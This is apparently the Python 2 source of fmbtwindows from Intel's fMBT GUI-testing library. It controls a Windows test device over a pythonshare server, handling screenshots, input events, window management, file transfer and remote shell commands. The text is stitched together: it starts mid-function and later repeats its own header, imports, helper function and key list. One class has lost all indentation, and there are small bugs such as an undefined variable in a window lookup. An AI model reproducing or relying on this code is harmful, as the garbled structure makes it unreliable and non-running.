        exitStatus != expectedExitStatus and
        exitStatus not in expectedExitStatus):
        # NOTE(review): the status is compared with both == and "in";
        # the "in" test raises TypeError for a plain integer, so callers
        # presumably always pass a list (recvScreenshot passes [0]) — confirm.
        msg = "Executing %s failed. Exit status: %s, expected %s" % (
            command, exitStatus, expectedExitStatus)
        _adapterLog("%s\n    stdout: %s\n    stderr: %s\n" % (msg, out, err))
        raise FMBTWindowsError(msg)
    return exitStatus, out, err
# Virtual-key code names accepted by key press/down/up calls; the full
# list is exposed to users through Device.keyNames().
_g_keyNames = [
    "VK_LBUTTON", "VK_RBUTTON", "VK_CANCEL", "VK_MBUTTON",
    "VK_XBUTTON1", "VK_XBUTTON2", "VK_BACK", "VK_TAB", "VK_CLEAR",
    "VK_RETURN", "VK_SHIFT", "VK_CONTROL", "VK_MENU", "VK_PAUSE",
    "VK_CAPITAL", "VK_KANA", "VK_HANGUL", "VK_JUNJA", "VK_FINAL",
    "VK_HANJA", "VK_KANJI", "VK_ESCAPE", "VK_CONVERT", "VK_NONCONVERT",
    "VK_ACCEPT", "VK_MODECHANGE", "VK_SPACE", "VK_PRIOR", "VK_NEXT",
    "VK_END", "VK_HOME", "VK_LEFT", "VK_UP", "VK_RIGHT", "VK_DOWN",
    "VK_SELECT", "VK_PRINT", "VK_EXECUTE", "VK_SNAPSHOT", "VK_INSERT",
    "VK_DELETE", "VK_HELP", "VK_LWIN", "VK_RWIN", "VK_APPS", "VK_SLEEP",
    "VK_NUMPAD0", "VK_NUMPAD1", "VK_NUMPAD2", "VK_NUMPAD3", "VK_NUMPAD4",
    "VK_NUMPAD5", "VK_NUMPAD6", "VK_NUMPAD7", "VK_NUMPAD8", "VK_NUMPAD9",
    "VK_MULTIPLY", "VK_ADD", "VK_SEPARATOR", "VK_SUBTRACT", "VK_DECIMAL",
    "VK_DIVIDE", "VK_F1", "VK_F2", "VK_F3", "VK_F4", "VK_F5", "VK_F6",
    "VK_F7", "VK_F8", "VK_F9", "VK_F10", "VK_F11", "VK_F12", "VK_F13",
    "VK_F14", "VK_F15", "VK_F16", "VK_F17", "VK_F18", "VK_F19", "VK_F20",
    "VK_F21", "VK_F22", "VK_F23", "VK_F24", "VK_NUMLOCK", "VK_SCROLL",
    "VK_LSHIFT", "VK_RSHIFT", "VK_LCONTROL", "VK_RCONTROL", "VK_LMENU",
    "VK_RMENU", "VK_BROWSER_BACK", "VK_BROWSER_FORWARD",
    "VK_BROWSER_REFRESH", "VK_BROWSER_STOP", "VK_BROWSER_SEARCH",
    "VK_BROWSER_FAVORITES", "VK_BROWSER_HOME", "VK_VOLUME_MUTE",
    "VK_VOLUME_DOWN", "VK_VOLUME_UP", "VK_MEDIA_NEXT_TRACK",
    "VK_MEDIA_PREV_TRACK", "VK_MEDIA_STOP", "VK_MEDIA_PLAY_PAUSE",
    "VK_LAUNCH_MAIL", "VK_LAUNCH_MEDIA_SELECT", "VK_LAUNCH_APP1",
    "VK_LAUNCH_APP2", "VK_OEM_1", "VK_OEM_PLUS", "VK_OEM_COMMA",
    "VK_OEM_MINUS", "VK_OEM_PERIOD", "VK_OEM_2", "VK_OEM_3", "VK_OEM_4",
    "VK_OEM_5", "VK_OEM_6", "VK_OEM_7", "VK_OEM_8", "VK_OEM_102",
    "VK_PROCESSKEY", "VK_PACKET", "VK_ATTN", "VK_CRSEL", "VK_EXSEL",
    "VK_EREOF", "VK_PLAY", "VK_ZOOM", "VK_PA1", "VK_OEM_CLEAR", "0", "1",
    "2", "3", "4", "5", "6", "7", "8", "9", "A", "B", "C", "D", "E", "F",
    "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T",
    "U", "V", "W", "X", "Y", "Z"]

# ShowWindow showCmd
SW_HIDE = 0
SW_NORMAL = 1
SW_MINIMIZED = 2
SW_MAXIMIZE = 3
SW_NOACTIVATE = 4
SW_SHOW = 5
SW_MINIMIZE = 6
SW_MINNOACTIVE = 7
SW_SHOWNA = 8
SW_RESTORE = 9
SW_DEFAULT = 10
SW_FORCEMINIMIZE = 11

# showCmd names accepted by showWindow(); the list index of each name
# equals the numeric SW_* value defined above.
_g_showCmds = [
    "SW_HIDE", "SW_NORMAL", "SW_MINIMIZED", "SW_MAXIMIZE", "SW_NOACTIVATE",
    "SW_SHOW", "SW_MINIMIZE", "SW_MINNOACTIVE", "SW_SHOWNA", "SW_RESTORE",
    "SW_DEFAULT", "SW_FORCEMINIMIZE"]
class ViewItem(fmbtgti.GUIItem):
    """A single widget in a dumped window hierarchy (see View)."""
    def __init__(self, view, itemId, parentId, className, text, bbox, dumpFilename):
        self._view = view
        self._itemId = itemId
        self._parentId = parentId
        self._className = className
        self._text = text
        fmbtgti.GUIItem.__init__(self, self._className, bbox, dumpFilename)
    def children(self):
        """Return the direct child items of this item."""
        childIds = (info[0] for info in self._view._itemTree[self._itemId])
        return [self._view._viewItems[childId] for childId in childIds]
    def __str__(self):
        return "ViewItem(%s)" % (self._view._dumpItem(self),)
class View(object):
    """
    Widget hierarchy dumped from one window.

    Items are kept both as the raw item tree (itemId -> list of
    (itemId, parentId, className, text, bbox) tuples) and as an
    itemId -> ViewItem dictionary.
    """
    def __init__(self, dumpFilename, itemTree):
        self._dumpFilename = dumpFilename
        self._itemTree = itemTree
        self._viewItems = {}
        # .items()/.values() instead of iteritems()/itervalues(): identical
        # behavior on Python 2, and keeps the class importable on Python 3.
        for itemId, winfoList in itemTree.items():
            for winfo in winfoList:
                itemId, parentId, className, text, bbox = winfo
                self._viewItems[itemId] = ViewItem(
                    self, itemId, parentId, className, text, bbox, dumpFilename)
    def _intCoords(self, *args):
        # TODO: relative coordinates like (0.5, 0.9)
        return [int(c) for c in args[0]]
    def rootItem(self):
        """Return the root item of the hierarchy."""
        return self._viewItems[self._itemTree["root"][0][0]]
    def _dumpItem(self, viewItem):
        # One-line debug representation of a single item.
        return "id=%s cls=%s text=%s bbox=%s" % (
            viewItem._itemId, repr(viewItem._className), repr(viewItem._text),
            viewItem._bbox)
    def _dumpTree(self, rootItem, depth=0):
        # Recursively collect indented debug lines for the subtree.
        l = ["%s%s" % (" " * (depth * 4), self._dumpItem(rootItem))]
        for child in rootItem.children():
            l.extend(self._dumpTree(child, depth+1))
        return l
    def dumpTree(self, rootItem=None):
        """
        Returns item tree as a string
        """
        if rootItem == None:
            rootItem = self.rootItem()
        return "\n".join(self._dumpTree(rootItem))
    def __str__(self):
        return "View(%s, %s items)" % (repr(self._dumpFilename), len(self._viewItems))
    def findItems(self, comparator, count=-1, searchRootItem=None, searchItems=None):
        """
        Returns list of at most count items for which comparator(item)
        is True, searched from searchRootItem's subtree, from the
        searchItems iterable, or from all items of the view.
        count < 0 means no limit.
        """
        foundItems = []
        if count == 0: return foundItems
        if searchRootItem != None:
            if comparator(searchRootItem):
                foundItems.append(searchRootItem)
            for c in searchRootItem.children():
                foundItems.extend(self.findItems(comparator, count=count-len(foundItems), searchRootItem=c))
        else:
            # Bug fix: the original bound domain = iter(searchItems) and then
            # called domain(), raising TypeError whenever searchItems was
            # given. Both branches now yield an iterable that is iterated
            # directly.
            if searchItems:
                domain = iter(searchItems)
            else:
                domain = self._viewItems.values()
            for i in domain:
                if comparator(i):
                    foundItems.append(i)
                    if count > 0 and len(foundItems) >= count:
                        break
        return foundItems
    def findItemsByText(self, text, partial=False, count=-1, searchRootItem=None, searchItems=None):
        """Find items by their text; partial=True matches substrings."""
        if partial:
            c = lambda item: (text in item._text)
        else:
            c = lambda item: (text == item._text)
        return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
    def findItemsByClass(self, className, partial=False, count=-1, searchRootItem=None, searchItems=None):
        """Find items by their class name; partial=True matches substrings."""
        if partial:
            c = lambda item: (className in item._className)
        else:
            c = lambda item: (className == item._className)
        return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
    def findItemsByPos(self, pos, count=-1, searchRootItem=None, searchItems=None, onScreen=None):
        """
        Returns list of ViewItems whose bounding box contains the position.

        Parameters:

          pos (pair of floats (0.0..1.0) or integers (x, y)):
                  coordinates that fall in the bounding box of found items.

          other parameters: refer to findItems documentation.

        Items are listed in ascending order based on area. They may
        or may not be from the same branch in the widget hierarchy.
        """
        x, y = self._intCoords(pos)
        c = lambda item: (item.bbox()[0] <= x <= item.bbox()[2] and item.bbox()[1] <= y <= item.bbox()[3])
        items = self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
        # sort from smallest to greatest area
        area_items = [((i.bbox()[2] - i.bbox()[0]) * (i.bbox()[3] - i.bbox()[1]), i) for i in items]
        return [i for _, i in sorted(area_items)]
class Device(fmbtgti.GUITestInterface):
    # GUITestInterface implementation that drives a Windows device through a
    # pythonshare connection (see WindowsConnection below).
    # NOTE: several methods use Python 2 tuple-parameter unpacking
    # (e.g. "def pinch(self, (x, y), ...)"); this module is Python 2 only.
    def __init__(self, connspec, password=None, screenshotSize=(None, None), **kwargs):
        """Connect to windows device under test.

        Parameters:

          connspec (string):
                  specification for connecting to a pythonshare
                  server that will run fmbtwindows-agent. The format is
                  "socket://<host>[:<port>]".

          password (optional, string or None):
                  authenticate to pythonshare server with given
                  password. The default is None (no authentication).

          rotateScreenshot (integer, optional)
                  rotate new screenshots by rotateScreenshot degrees.
                  Example: rotateScreenshot=-90. The default is 0 (no
                  rotation).

        To prepare a windows device for connection, launch there

        python pythonshare-server --password mysecretpwd

        When not on trusted network, consider ssh port forward, for
        instance.
        """
        # NOTE(review): the screenshotSize parameter is accepted but unused
        # here; forcing a resolution goes through setScreenshotSize() —
        # confirm whether it should be forwarded to the connection.
        fmbtgti.GUITestInterface.__init__(self, **kwargs)
        self.setConnection(WindowsConnection(connspec, password))
    def existingView(self):
        # Return the latest refreshView() result; fail loudly if no view has
        # been fetched yet.
        if self._lastView:
            return self._lastView
        else:
            raise FMBTWindowsError("view is not available. Missing refreshView()?")
    def getFile(self, remoteFilename, localFilename=None):
        """
        Fetch file from the device.

        Parameters:

          remoteFilename (string):
                  file to be fetched on device

          localFilename (optional, string or None):
                  file to be saved to local filesystem. If None,
                  return contents of the file without saving them.
        """
        return self._conn.recvFile(remoteFilename, localFilename)
    def getMatchingPaths(self, pathnamePattern):
        """
        Returns list of paths matching pathnamePattern on the device.

        Parameters:

          pathnamePattern (string):
                  Pattern for matching files and directories on the device.

        Example:

          getMatchingPaths("c:/windows/*.ini")

        Implementation runs glob.glob(pathnamePattern) on remote device.
        """
        return self._conn.recvMatchingPaths(pathnamePattern)
    def keyNames(self):
        """
        Returns list of key names recognized by pressKey
        """
        return sorted(_g_keyNames)
    def pinch(self, (x, y), startDistance, endDistance,
              finger1Dir=90, finger2Dir=270, movePoints=20,
              duration=0.75):
        """
        Pinch (open or close) on coordinates (x, y).

        Parameters:

          x, y (integer):
                  the central point of the gesture. Values in range
                  [0.0, 1.0] are scaled to full screen width and
                  height.

          startDistance, endDistance (float):
                  distance from both finger tips to the central point
                  of the gesture, at the start and at the end of the
                  gesture. Values in range [0.0, 1.0] are scaled up to
                  the distance from the coordinates to the edge of the
                  screen. Both finger tips will reach an edge if
                  distance is 1.0.

          finger1Dir, finger2Dir (integer, optional):
                  directions for finger tip movements, in range [0,
                  360]. 0 is to the east, 90 to the north, etc. The
                  defaults are 90 and 270.

          movePoints (integer, optional):
                  number of points to which finger tips are moved
                  after laying them to the initial positions. The
                  default is 20.

          duration (float, optional):
                  duration of the gesture in seconds, the default is 0.75.
        """
        screenWidth, screenHeight = self.screenSize()
        # NOTE(review): screenDiagonal is computed but never used below.
        screenDiagonal = math.sqrt(screenWidth**2 + screenHeight**2)
        if x == None: x = 0.5
        if y == None: y = 0.5
        x, y = self.intCoords((x, y))
        # Float distances in [0.0, 1.0] are scaled to the larger of the two
        # finger-direction edge distances; anything else is taken as pixels.
        if type(startDistance) == float and 0.0 <= startDistance <= 1.0:
            startDistanceInPixels = (startDistance *
                                     max(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
                                         fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
        else: startDistanceInPixels = int(startDistance)
        if type(endDistance) == float and 0.0 <= endDistance <= 1.0:
            endDistanceInPixels = (endDistance *
                                   max(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
                                       fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
        else: endDistanceInPixels = int(endDistance)
        # Finger tip start/end points on circles around (x, y); screen y grows
        # downwards, hence the minus in front of sin.
        finger1startX = int(x + math.cos(math.radians(finger1Dir)) * startDistanceInPixels)
        finger1startY = int(y - math.sin(math.radians(finger1Dir)) * startDistanceInPixels)
        finger1endX = int(x + math.cos(math.radians(finger1Dir)) * endDistanceInPixels)
        finger1endY = int(y - math.sin(math.radians(finger1Dir)) * endDistanceInPixels)
        finger2startX = int(x + math.cos(math.radians(finger2Dir)) * startDistanceInPixels)
        finger2startY = int(y - math.sin(math.radians(finger2Dir)) * startDistanceInPixels)
        finger2endX = int(x + math.cos(math.radians(finger2Dir)) * endDistanceInPixels)
        finger2endY = int(y - math.sin(math.radians(finger2Dir)) * endDistanceInPixels)
        self.existingConnection().sendPinch(
            (finger1startX, finger1startY), (finger1endX, finger1endY),
            (finger2startX, finger2startY), (finger2endX, finger2endY),
            movePoints, duration)
        return True
    def pinchOpen(self, (x, y) = (0.5, 0.5), startDistance=0.1, endDistance=0.5, **pinchKwArgs):
        """
        Make the open pinch gesture.

        Parameters:

          x, y (integer, optional):
                  the central point of the gesture, the default is in
                  the middle of the screen.

          startDistance, endDistance (float, optional):
                  refer to pinch documentation. The default is 0.1 and
                  0.5.

          for the rest of the parameters, refer to pinch documentation.
        """
        return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
    def pinchClose(self, (x, y) = (0.5, 0.5), startDistance=0.5, endDistance=0.1, **pinchKwArgs):
        """
        Make the close pinch gesture.

        Parameters:

          x, y (integer, optional):
                  the central point of the gesture, the default is in
                  the middle of the screen.

          startDistance, endDistance (float, optional):
                  refer to pinch documentation. The default is 0.5 and
                  0.1.

          rest of the parameters: refer to pinch documentation.
        """
        return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
    def putFile(self, localFilename, remoteFilepath):
        """
        Send local file to the device

        Parameters:

          localFilename (string):
                  file to be sent.

          remoteFilepath (string):
                  destination on the device. If destination is an
                  existing directory, the file will be saved to the
                  directory with its original name. Otherwise the file
                  will be saved with remoteFilepath as new name.
        """
        return self._conn.sendFile(localFilename, remoteFilepath)
    def refreshView(self, window=None, forcedView=None):
        """
        (Re)reads widgets on the top window and updates the latest view.

        Parameters:

          window (integer (hWnd) or string (title), optional):
                  read widgets from given window instead of the top window.

          forcedView (View or filename, optional):
                  use given View object or view file instead of reading the
                  items from the device.

        Returns View object.
        """
        if forcedView != None:
            if isinstance(forcedView, View):
                self._lastView = forcedView
            elif type(forcedView) in [str, unicode]:
                # Load a previously saved view dump (Python 2 file()).
                self._lastView = View(forcedView,
                                      ast.literal_eval(file(forcedView).read()))
        else:
            if self.screenshotDir() == None:
                self.setScreenshotDir(self._screenshotDirDefault)
            if self.screenshotSubdir() == None:
                self.setScreenshotSubdir(self._screenshotSubdirDefault)
            # Store the view dump next to where the screenshot would go,
            # with a ".view" suffix.
            viewFilename = self._newScreenshotFilepath()[:-3] + "view"
            viewData = self._conn.recvViewData(window)
            file(viewFilename, "w").write(repr(viewData))
            self._lastView = View(viewFilename, viewData)
        return self._lastView
    def setDisplaySize(self, size):
        """
        Transform coordinates of synthesized events (like a tap) from
        screenshot resolution to display input area size. By default
        events are synthesized directly to screenshot coordinates.

        Parameters:

          size (pair of integers: (width, height)):
                  width and height of display in pixels. If not given,
                  values from EnumDisplayMonitors are used.

        Returns None.
        """
        width, height = size
        screenWidth, screenHeight = self.screenSize()
        # NOTE(review): with integer inputs Python 2 "/" truncates the scaled
        # coordinates — confirm that is the intended rounding.
        self._conn.setScreenToDisplayCoords(
            lambda x, y: (x * width / screenWidth,
                          y * height / screenHeight))
        self._conn.setDisplayToScreenCoords(
            lambda x, y: (x * screenWidth / width,
                          y * screenHeight / height))
    def setForegroundWindow(self, window):
        """
        Set a window with the title as a foreground window

        Parameters:

          window (title (string) or hwnd (integer):
                  title or handle of the window to be raised
                  foreground.

        Returns True if the window was brought to the foreground,
        otherwise False.

        Notes: calls SetForegroundWindow in user32.dll.
        """
        return self.existingConnection().sendSetForegroundWindow(window)
    def setScreenshotSize(self, size):
        """
        Force screenshots from device to use given resolution.
        Overrides detected monitor resolution on device.

        Parameters:

          size (pair of integers: (width, height)):
                  width and height of screenshot.
        """
        self._conn.setScreenshotSize(size)
    def shell(self, command):
        """
        Execute command in Windows.

        Parameters:

          command (string or list of strings):
                  command to be executed. Will be forwarded directly
                  to subprocess.check_output.  If command is a string,
                  then it will be executed in subshell, otherwise without
                  shell.

        Returns what is printed by the command.

        If you wish to receive exitstatus or standard output and error
        separated from command, refer to shellSOE().
        """
        return self._conn.evalPython('shell(%s)' % (repr(command),))
    def shellSOE(self, command, asyncStatus=None, asyncOut=None, asyncError=None):
        """
        Execute command on Windows.

        Parameters:

          command (string or list of strings):
                  command to be executed. If command is a list of
                  string, it will be executed without shell
                  (subprocess.check_output with shell=False).
                  If command is a single-line string, it will be
                  executed in shell (subprocess.check_output with
                  shell=True).
                  If command is a multiline string, it will be written
                  to a BAT file and executed as a script.

          asyncStatus (string or None)
                  filename (on device) to which the status of
                  asynchronously executed shellCommand will be
                  written. The default is None, that is, command will
                  be run synchronously, and status will be returned in
                  the tuple.

          asyncOut (string or None)
                  filename (on device) to which the standard output of
                  asynchronously executed shellCommand will be
                  written. The default is None.

          asyncError (string or None)
                  filename (on device) to which the standard error of
                  asynchronously executed shellCommand will be
                  written. The default is None.

        Returns triplet: exit status, standard output and standard error
        from the command.

        If executing command fails, returns None, None, None.
        """
        return self._conn.evalPython(
            'shellSOE(%s, asyncStatus=%s, asyncOut=%s, asyncError=%s)'
            % (repr(command),
               repr(asyncStatus), repr(asyncOut), repr(asyncError)))
    def showWindow(self, window, showCmd=SW_NORMAL):
        """
        Send showCmd to window.

        Parameters:

          window (window title (string) or handle (integer)):
                  window to which the command will be sent.

          showCmd (integer or string):
                  command to be sent. Valid commands are 0..11:
                  SW_HIDE, SW_NORMAL, SW_MINIMIZED, SW_MAXIMIZE,
                  SW_NOACTIVATE, SW_SHOW SW_MINIMIZE, SW_MINNOACTIVE,
                  SW_SHOWNA, SW_RESTORE, SW_DEFAULT, SW_FORCEMINIMIZE.

        Returns True if the window was previously visible,
        otherwise False.

        Notes: calls ShowWindow in user32.dll.
        """
        return self.existingConnection().sendShowWindow(window, showCmd)
    def tapText(self, text, partial=False, **tapKwArgs):
        """
        Find an item with given text from the latest view, and tap it.

        Parameters:

          partial (boolean, optional):
                  refer to verifyText documentation. The default is
                  False.

          tapPos (pair of floats (x, y)):
                  refer to tapItem documentation.

          button, long, hold, count, delayBetweenTaps (optional):
                  refer to tap documentation.

        Returns True if successful, otherwise False.
        """
        items = self.existingView().findItemsByText(text, partial=partial, count=1)
        if len(items) == 0: return False
        return self.tapItem(items[0], **tapKwArgs)
    def topWindowProperties(self):
        """
        Return properties of the top window as a dictionary
        """
        return self._conn.recvTopWindowProperties()
    def verifyText(self, text, partial=False):
        """
        Verify that the last view has at least one item with given
        text.

        Parameters:

          text (string):
                  text to be searched for in items.

          partial (boolean, optional):
                  if True, match items if item text contains given
                  text, otherwise match only if item text is equal to
                  the given text. The default is False (exact match).
        """
        assert self._lastView != None, "View required."
        return self._lastView.findItemsByText(text, partial=partial, count=1) != []
    def windowList(self):
        """
        Return list of properties of windows (dictionaries)

        Example: list window handles and titles:
          for props in d.windowList():
              print props["hwnd"], props["title"]
        """
        return self._conn.recvWindowList()
    def launchHTTPD(self):
        """
        DEPRECATED, will be removed, do not use!
        """
        return self._conn.evalPython("launchHTTPD()")
    def stopHTTPD(self):
        """
        DEPRECATED, will be removed, do not use!
        """
        return self._conn.evalPython("stopHTTPD()")
    def view(self):
        # Latest view, or None if refreshView() has never been called.
        return self._lastView
class WindowsConnection(fmbtgti.GUITestConnection):
def __init__(self, connspec, password):
fmbtgti.GUITestConnection.__init__(self)
self._screenshotSize = (None, None) # autodetect
self._agent = pythonshare.connection(connspec, password=password)
self._agent_ns = self._agent.namespace()
agentFilename = os.path.join(
os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))),
"fmbtwindows_agent.py")
self._agent.exec_in(self._agent_ns, file(agentFilename).read())
self.setScreenToDisplayCoords(lambda x, y: (x, y))
self.setDisplayToScreenCoords(lambda x, y: (x, y))
def setScreenshotSize(self, screenshotSize):
self._screenshotSize = screenshotSize
screenW, screenH = self._screenshotSize
inputW, inputH = self._agent.eval_in(self._agent_ns, "_mouse_input_area")
self.setScreenToDisplayCoords(
lambda x, y: (x * inputW / screenW, y * inputH / screenH))
self.setDisplayToScreenCoords(
lambda x, y: (x * screenW / inputW, y * screenH / inputH))
def execPython(self, code):
return self._agent.exec_in(self._agent_ns, code)
def evalPython(self, code):
return self._agent.eval_in(self._agent_ns, code)
def recvFile(self, remoteFilename, localFilename=None):
data = self._agent.eval_in(self._agent_ns, "file(%s, 'rb').read()" % (repr(remoteFilename),))
if localFilename:
file(localFilename, "wb").write(data)
return True
else:
return data
def sendFile(self, localFilename, remoteFilepath):
data = file(localFilename).read()
rv = self.evalPython('saveFile(%s, %s, base64.b64decode(%s))' %
(repr(os.path.basename(localFilename)),
repr(remoteFilepath),
repr(base64.b64encode(data))))
return rv
def recvMatchingPaths(self, pathnamePattern):
return self._agent.eval_in(self._agent_ns,
"glob.glob(%s)" % (repr(pathnamePattern),))
def recvScreenshot(self, filename, screenshotSize=(None, None)):
ppmfilename = filename + ".ppm"
if screenshotSize == (None, None):
screenshotSize = self._screenshotSize
width, height, zdata = self._agent.eval_in(
self._agent_ns, "screenshotZYBGR(%s)" % (repr(screenshotSize),))
data = zlib.decompress(zdata)
fmbtgti.eye4graphics.wbgr2rgb(data, width, height)
if fmbtpng != None:
file(filename, "wb").write(
fmbtpng.raw2png(data, width, height, 8, "RGB"))
else:
ppm_header = "P6\n%d %d\n%d\n" % (width, height, 255)
f = file(filename + ".ppm", "wb")
f.write(ppm_header)
f.write(data)
f.close()
_run([fmbt_config.imagemagick_convert, ppmfilename, filename], expectedExitStatus=[0])
os.remove(ppmfilename)
return True
def recvTopWindowProperties(self):
return self.evalPython("topWindowProperties()")
def recvViewData(self, window=None):
if window == None:
rv = self.evalPython("topWindowWidgets()")
elif isinstance(window, int):
rv = self.evalPython("windowWidgets(%s)" % (repr(window),))
elif isinstance(window, str) or isinstance(window, unicode):
wlist = self.evalPython("windowList()")
for w in wlist:
if w["title"] == window:
rv = self.evalPython("windowWidgets(%s)" % (repr(w["hwnd"]),))
break
else:
raise ValueError('no window with title "%s"' % (window,))
else:
raise ValueError('illegal window "%s", expected integer or string (hWnd or title)' % (window,))
return rv
def recvWindowList(self):
return self.evalPython("windowList()")
def _window2hwnd(self, window):
if isinstance(window, str) or isinstance(window, unicode):
windowList = self.recvWindowList()
hwndList = [w["hwnd"] for w in windowList if w["title"] == window]
if not hwndList:
raise ValueError('no window with title "%s"' % (title,))
hwnd = hwndList[0]
elif isinstance(window, int):
hwnd = window
else:
raise ValueError('invalid window "%s", string or integer expected' % (window,))
return hwnd
def sendSetForegroundWindow(self, window):
hwnd = self._window2hwnd(window)
return 0 != self.evalPython("ctypes.windll.user32.SetForegroundWindow(%s)" %
(repr(hwnd),))
def sendShowWindow(self, window, showCmd):
hwnd = self._window2hwnd(window)
if isinstance(showCmd, str) or isinstance(showCmd, unicode):
if showCmd in _g_showCmds:
showCmd = _g_showCmds.index(showCmd)
else:
raise ValueError('invalid showCmd: "%s"' % (showCmd,))
return 0 != self.evalPython("ctypes.windll.user32.ShowWindow(%s, %s)" %
(repr(hwnd), repr(showCmd)))
def sendType(self, text):
command = 'sendType(%s)' % (repr(text),)
self._agent.eval_in(self._agent_ns, command)
return True
def sendPress(self, keyCode, modifiers=None):
if modifiers == None:
command = 'sendKey("%s",[])' % (keyCode,)
else:
command = 'sendKey("%s",%s)' % (keyCode, repr(modifiers))
self._agent.eval_in(self._agent_ns, command)
return True
def sendKeyDown(self, keyCode, modifiers=None):
if modifiers == None:
command = 'sendKeyDown("%s",[])' % (keyCode,)
else:
command = 'sendKeyDown("%s",%s)' % (keyCode, repr(modifiers))
self._agent.eval_in(self._agent_ns, command)
return True
def sendKeyUp(self, keyCode, modifiers=None):
if modifiers == None:
command = 'sendKeyUp("%s",[])' % (keyCode,)
else:
command = 'sendKeyUp("%s",%s)' % (keyCode, repr(modifiers))
self._agent.eval_in(self._agent_ns, command)
return True
def sendTap(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTap(%s, %s)" % (x, y)
else:
command = "sendClick(%s, %s, %s)" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendTouchDown(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTouchDown(%s, %s)" % (x, y)
else:
command = "(sendMouseMove(%s, %s), sendMouseDown(%s))" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendTouchMove(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTouchMove(%s, %s)" % (x, y)
else:
command = "sendMouseMove(%s, %s, %s)" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendTouchUp(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTouchUp(%s, %s)" % (x, y)
else:
command = "sendMouseUp(%s, %s, %s)" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendPinch(self, *args):
self.evalPython("touchPinch%s" % (args,))
return True
    def setScreenToDisplayCoords(self, screenToDisplayFunction):
        # Install the function mapping screenshot coordinates to display
        # input coordinates; used by the send* input methods.
        self._screenToDisplay = screenToDisplayFunction
    def setDisplayToScreenCoords(self, displayToScreenFunction):
        # Install the inverse mapping: display input coordinates back to
        # screenshot coordinates.
        self._displayToScreen = displayToScreenFunction
class FMBTWindowsError(Exception): pass
# fmbtwindows: added view.save()  (stray changelog line preserved as a comment)
# fMBT, free Model Based Testing tool
# Copyright (c) 2014, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU Lesser General Public License,
# version 2.1, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
"""
This library implements the fMBT GUITestInterface for Windows.
How to setup Windows device under test
1. Install Python 2.X. (For example 2.7.)
2. Add Python to PATH, so that command "python" starts the interpreter.
3. Copy fMBT's pythonshare directory to Windows.
4. In the pythonshare directory, run "python setup.py install"
5. Run:
cd \\python27\\scripts
python pythonshare-server --interface=all --password=xxxxxxxx
How to connect to the device
import fmbtwindows
d = fmbtwindows.Device("IP-ADDRESS-OF-THE-DEVICE", password="xxxxxxxx")
"""
import ast
import base64
import fmbt
import fmbt_config
import fmbtgti
import inspect
import math
import os
import pythonshare
import shutil
import subprocess
import zlib
try:
import fmbtpng
except ImportError:
fmbtpng = None
# On native Windows (os.name == "nt"), Python 2's subprocess cannot use
# close_fds together with redirected stdout/stderr, so disable it there.
if os.name == "nt":
    _g_closeFds = False
else:
    _g_closeFds = True
def _adapterLog(msg):
    # Write msg to the fMBT adapter log, tagged with this module's name.
    fmbt.adapterlog("fmbtwindows %s" % (msg,))
def _run(command, expectedExitStatus=None):
    """
    Execute command in child process, return status, stdout, stderr.

    command is run through the shell when given as a string, directly
    otherwise. When expectedExitStatus is None the child is not waited
    for and ('', None) is returned as (out, err).
    NOTE(review): the final check does "exitStatus not in expectedExitStatus",
    so expectedExitStatus is expected to be a sequence (e.g. [0]) — an
    int argument would raise TypeError on that line; confirm callers.
    """
    if type(command) == str:
        shell = True
    else:
        shell = False
    try:
        p = subprocess.Popen(command, shell=shell,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE,
                             close_fds=_g_closeFds)
        if expectedExitStatus != None:
            out, err = p.communicate()
        else:
            out, err = ('', None)
    except Exception, e:
        # Synthesize a process-like namespace for the failure path; note the
        # class object itself (not an instance) is used as the namespace.
        class fakeProcess(object): pass
        p = fakeProcess
        p.returncode = 127
        out, err = ('', e)
    exitStatus = p.returncode
    if (expectedExitStatus != None and
        exitStatus != expectedExitStatus and
        exitStatus not in expectedExitStatus):
        msg = "Executing %s failed. Exit status: %s, expected %s" % (
            command, exitStatus, expectedExitStatus)
        _adapterLog("%s\n stdout: %s\n stderr: %s\n" % (msg, out, err))
        raise FMBTWindowsError(msg)
    return exitStatus, out, err
# Windows virtual-key names accepted by pressKey / sendPress
# (VK_* constants plus digits and letters).
_g_keyNames = [
    "VK_LBUTTON", "VK_RBUTTON", "VK_CANCEL", "VK_MBUTTON",
    "VK_XBUTTON1", "VK_XBUTTON2", "VK_BACK", "VK_TAB", "VK_CLEAR",
    "VK_RETURN", "VK_SHIFT", "VK_CONTROL", "VK_MENU", "VK_PAUSE",
    "VK_CAPITAL", "VK_KANA", "VK_HANGUL", "VK_JUNJA", "VK_FINAL",
    "VK_HANJA", "VK_KANJI", "VK_ESCAPE", "VK_CONVERT", "VK_NONCONVERT",
    "VK_ACCEPT", "VK_MODECHANGE", "VK_SPACE", "VK_PRIOR", "VK_NEXT",
